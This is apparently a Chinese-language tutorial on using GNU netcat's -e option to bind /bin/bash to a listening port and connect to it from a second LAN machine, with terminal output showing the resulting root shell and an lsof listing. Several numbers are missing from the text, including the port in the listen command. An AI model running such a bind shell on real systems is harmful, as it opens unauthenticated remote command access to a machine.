首先是netcat的版本选择BSD版的不支技-c -e参数,而GNU版的有-e参数,这里我用的是GNU版:
sh-4.1# nc -V
netcat (The GNU Netcat) 0.7.
Copyright (C) - Giovanni Giacobbi This program comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of this program under the terms of
the GNU General Public License.
For more information about these matters, see the file named COPYING. Original idea and design by Avian Research <hobbit@avian.org>,
Written by Giovanni Giacobbi <giovanni@giacobbi.net>.
首先需要在控制机上监听端口(控制机:192.168.1.110)
sh-4.1# nc -v -l -p -e /bin/bash #监听的端口是1234
#当然确保iptables开放1234这个端口
客户端去连接:
[root@znode02 netcat-0.7.]# ip a
: lo: <LOOPBACK,UP,LOWER_UP> mtu qdisc noqueue state UNKNOWN
link/loopback ::::: brd :::::
inet 127.0.0.1/ scope host lo
inet6 ::/ scope host
valid_lft forever preferred_lft forever
: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu qdisc pfifo_fast state UP qlen
link/ether :::6e:b4: brd ff:ff:ff:ff:ff:ff
inet 192.168.1.111/ brd 255.255.255.255 scope global eth0
inet6 fe80:::ff:fe6e:b483/ scope link
valid_lft forever preferred_lft forever
[root@znode02 netcat-0.7.]# nc 192.168.1.110
ip a
: lo: <LOOPBACK,UP,LOWER_UP> mtu qdisc noqueue state UNKNOWN
link/loopback ::::: brd :::::
inet 127.0.0.1/ scope host lo
inet6 ::/ scope host
valid_lft forever preferred_lft forever
: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu qdisc pfifo_fast state UP qlen
link/ether :::ed:c2:db brd ff:ff:ff:ff:ff:ff
inet 192.168.1.110/ brd 255.255.255.255 scope global eth0
inet6 fe80:::ff:feed:c2db/ scope link
valid_lft forever preferred_lft forever
客户端连上后把执行的shell都是在服务端,连之前的ip a 显示的是客户端的ip 连上之后是显示的服务端的ip
#注意一个端口只能一台客户机去连,并如果推出,无法再连!!!!
在被控制端也即服务端,查看开放的1234端口:
[root@GitLab ~]# lsof -i:
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash root 0u IPv4 0t0 TCP 192.168.1.110:search-agent->192.168.1.111: (ESTABLISHED)
bash root 1u IPv4 0t0 TCP 192.168.1.110:search-agent->192.168.1.111: (ESTABLISHED)
bash root 2u IPv4 0t0 TCP 192.168.1.110:search-agent->192.168.1.111: (ESTABLISHED)